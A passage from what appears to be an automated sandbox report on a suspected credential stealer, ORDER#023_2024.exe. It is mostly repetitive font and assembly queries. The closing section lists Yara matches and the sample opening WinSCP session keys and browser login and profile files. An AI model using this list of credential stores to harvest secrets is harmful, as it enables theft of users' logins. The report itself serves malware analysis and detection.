                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Users\user\Desktop\ORDER#023_2024.exe | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 5.2.ORDER#023_2024.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.ORDER#023_2024.exe.3c384f0.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.ORDER#023_2024.exe.3c61510.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.ORDER#023_2024.exe.3c384f0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000005.00000002.2903371766.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: dump.pcap, type: PCAP
                        Source: Yara match | File source: 00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: ORDER#023_2024.exe PID: 4268, type: MEMORYSTR
                        Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
